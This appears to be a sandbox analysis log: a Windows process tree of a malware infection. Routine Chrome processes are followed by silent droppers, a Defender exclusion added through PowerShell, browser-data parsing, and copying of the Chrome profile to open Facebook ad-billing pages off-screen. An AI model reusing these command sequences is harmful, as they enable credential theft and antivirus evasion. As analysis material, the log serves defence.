C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1832 /prefetch:812⤵PID:1556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1820 /prefetch:812⤵PID:4376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1772 /prefetch:212⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:112⤵PID:5804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2972 /prefetch:112⤵PID:1684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3300 /prefetch:812⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:112⤵PID:5936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:112⤵PID:1352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3296 /prefetch:812⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:112⤵PID:4596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:112⤵PID:5896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4368 /prefetch:812⤵PID:632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:812⤵PID:664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:812⤵PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:812⤵PID:4672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:812⤵PID:6860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:812⤵PID:4820
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings12⤵PID:6928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5876 /prefetch:812⤵PID:6244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:812⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:812⤵PID:6172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5684 /prefetch:812⤵PID:6380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3952 /prefetch:812⤵PID:6236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:812⤵PID:6376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3832 /prefetch:812⤵PID:3820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:812⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:812⤵PID:6668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:812⤵PID:6740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:812⤵PID:6364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3628 /prefetch:812⤵PID:3512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:812⤵PID:6660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:812⤵PID:3384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4108 /prefetch:812⤵PID:7004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4588 /prefetch:812⤵PID:5744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4908 /prefetch:812⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:812⤵PID:5968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:812⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6252 /prefetch:812⤵PID:5768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:812⤵PID:6712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:112⤵PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6536 /prefetch:812⤵PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6664 /prefetch:812⤵PID:5664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6804 /prefetch:812⤵PID:6044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:812⤵PID:6940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7092 /prefetch:812⤵PID:5048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6936 /prefetch:812⤵PID:6536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7240 /prefetch:812⤵PID:3980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:812⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7640 /prefetch:812⤵PID:6608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:112⤵PID:5296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8000 /prefetch:812⤵PID:7120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8160 /prefetch:812⤵PID:1192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:812⤵PID:5436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8504 /prefetch:812⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8356 /prefetch:112⤵PID:6708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8500 /prefetch:812⤵PID:4484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8752 /prefetch:812⤵PID:5704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8900 /prefetch:812⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7876 /prefetch:812⤵PID:5216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10526638455587250193,2948845849265938655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 /prefetch:812⤵PID:5400
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg8⤵
- Runs .reg file with regedit
PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox8⤵PID:7112
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome8⤵PID:4744
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge8⤵PID:6204
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\PictureLAb.exe" /Verysilent4⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\is-20142.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-20142.tmp\PictureLAb.tmp" /SL5="$303C8,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\PictureLAb.exe" /Verysilent5⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\is-GKRFQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GKRFQ.tmp\Setup.exe" /VERYSILENT6⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\is-KU7P9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KU7P9.tmp\Setup.tmp" /SL5="$2043E,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-GKRFQ.tmp\Setup.exe" /VERYSILENT7⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\is-MRP1S.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-MRP1S.tmp\kkkk.exe" /S /UID=lab2148⤵PID:5964
-
C:\Program Files\Reference Assemblies\NBIYCDYOIX\prolab.exe"C:\Program Files\Reference Assemblies\NBIYCDYOIX\prolab.exe" /VERYSILENT9⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\is-LB3BN.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB3BN.tmp\prolab.tmp" /SL5="$20374,575243,216576,C:\Program Files\Reference Assemblies\NBIYCDYOIX\prolab.exe" /VERYSILENT10⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb-ba638-7f2-38593-95a6ed2cda723\Xiwaeqowahu.exe"C:\Users\Admin\AppData\Local\Temp\bb-ba638-7f2-38593-95a6ed2cda723\Xiwaeqowahu.exe"9⤵PID:4440
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h14db0mu.adt\GcleanerWW.exe /mixone & exit10⤵PID:6792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcfygznm.jzq\privacytools5.exe & exit10⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\bcfygznm.jzq\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\bcfygznm.jzq\privacytools5.exe11⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\bcfygznm.jzq\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\bcfygznm.jzq\privacytools5.exe12⤵PID:6788
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bjatfdl5.zqu\setup.exe /8-2222 & exit10⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\bjatfdl5.zqu\setup.exeC:\Users\Admin\AppData\Local\Temp\bjatfdl5.zqu\setup.exe /8-222211⤵PID:5824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Floral-Sea"12⤵PID:5396
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1oja5ne4.kcs\MultitimerFour.exe & exit10⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\1oja5ne4.kcs\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\1oja5ne4.kcs\MultitimerFour.exe11⤵PID:6320
-
C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10412⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe" 1 3.1615014753.60432b612c6e6 10413⤵PID:4804
-
C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\R4TPMHOPH5\multitimer.exe" 2 3.1615014753.60432b612c6e614⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\lo345jerpj4\safebits.exe"C:\Users\Admin\AppData\Local\Temp\lo345jerpj4\safebits.exe" /S /pubid=1 /subid=45115⤵PID:6244
-
-
C:\Users\Admin\AppData\Local\Temp\ga3y5c3ilhi\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ga3y5c3ilhi\askinstall24.exe"15⤵PID:4872
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe16⤵PID:6140
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe17⤵
- Kills process with taskkill
PID:5876
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y16⤵PID:6136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/16⤵PID:6520
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffea9d56e00,0x7ffea9d56e10,0x7ffea9d56e2017⤵PID:6568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2144 /prefetch:817⤵PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1648 /prefetch:817⤵PID:6988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:217⤵PID:4736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1588,14646270535376059695,2581927321552393334,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:117⤵PID:4920
-
-
